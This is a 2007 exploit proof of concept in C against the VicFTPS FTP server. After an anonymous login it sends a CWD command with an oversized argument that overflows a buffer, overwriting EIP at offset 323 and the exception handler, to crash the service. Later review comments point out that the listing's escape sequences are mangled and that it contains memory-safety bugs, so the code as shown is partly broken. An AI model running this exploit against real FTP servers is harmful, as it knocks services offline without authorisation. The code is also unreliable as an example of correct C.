# Title : VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC
# Published : 2007-02-18
# Author : r0ut3r
/*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
DoS Proof of concept
r0ut3r (writ3r [at] gmail.com)
Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.
Greets Marsu, and Timq.
Description:
Sending a long argument to CWD causes VicFTPs Server
to overwrite memory. EIP is overwritten at offset 323. The PoC
uses a larger buffer so that the exception handler is overwritten
as well, preventing an error message.
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 21 /* FTP control port the PoC connects to */
/* Socket descriptor for the single control connection; assigned in main(). */
int s;
/* Target address, filled from argv[1] in main(); static storage, so zeroed. */
struct sockaddr_in sock_addr;
/* Scratch buffer for server replies: every reply is read into it and discarded. */
char recvbuf[1024];
/* The CWD command buffer, filled in main(); no NUL terminator is ever written. */
char pwn[450];
int main(int argc, char* argv[])
{
/*
 * Entry point of the PoC. argv[1] is the target address. The program opens
 * one TCP connection to PORT, sends USER and PASS lines for "anonymous",
 * then sends a single CWD command whose argument is 400 'A' bytes.
 *
 * Returns 1 on a usage error or when socket(), connect() or any send()
 * fails; returns 0 after the final send(). None of the recv() calls has its
 * return value checked, and the socket is never closed explicitly.
 *
 * NOTE(review): the string literals end in "n" / "rn" where newline and
 * CR-LF escapes would be expected; the backslashes look like they were lost
 * when the listing was extracted. The code is documented as it stands.
 */
if (argc < 2) {
printf("Usage: %s <ip>n", argv[0]);
return 1; }
/* All diagnostics go to stdout, not stderr. */
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("error with socketn");
return 1; }
sock_addr.sin_family = AF_INET;
/* inet_addr() is declared in <arpa/inet.h>, which is not included here. Its
 * failure value (INADDR_NONE) is not checked, so an unparsable argv[1] is
 * only noticed when connect() fails. */
sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
sock_addr.sin_port = htons(PORT);
if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("unable to connectn");
return 1; }
printf("[+] Connectedn");
/* Server banner: read into recvbuf and discarded. recvbuf is filled with
 * spaces, never NUL-terminated and never printed. */
memset(recvbuf, ' ', 1024);
recv(s, recvbuf, 1024, 0);
char userbuf[50];
printf("[+] Sending user...n");
memset(userbuf, ' ', 50);
/* The literal is 17 bytes including its terminator, so copying 18 reads one
 * byte past it (undefined behaviour). The terminator does land in userbuf,
 * so strlen() below yields 16. */
memcpy(userbuf, "USER anonymousrn", 18);
if (send(s, userbuf, strlen(userbuf), 0) == -1) {
printf("unable to send datan");
return 1; }
/* USER reply: read and discarded. */
memset(recvbuf, ' ', 1024);
recv(s, recvbuf, 1024, 0);
char passbuf[50];
printf("[+] Sending pass...n");
/* Same over-long memcpy as for userbuf; passbuf is otherwise uninitialised,
 * but strlen() stops at the copied terminator. */
memcpy(passbuf, "PASS anonymousrn", 18);
if (send(s, passbuf, strlen(passbuf), 0) == -1) {
printf("unable to send datan");
return 1; }
/* PASS reply: read and discarded (recvbuf is not cleared this time). */
recv(s, recvbuf, 1024, 0);
printf("[+] Building payload. n");
/* pwn layout: "CWD " at 0..3, 400 'A' at 4..403, "rn" at 404..405, spaces
 * up to 449. No NUL byte is ever written into pwn. */
memset(pwn, ' ', 450);
memcpy(pwn, "CWD ", 4);
memset(pwn+4, 'A', 400);
memcpy(pwn+404, "rn", 2);
printf("[+] Sending payload.n");
/* strlen(pwn) reads beyond the 450-byte array because it holds no
 * terminator (undefined behaviour); the number of bytes sent is at least
 * 450 but otherwise not well-defined. */
if (send(s, pwn, strlen(pwn), 0) == -1) {
printf("unable to send datan");
return 1; }
printf("[!] Boom! crashed?!n");
return 0;
}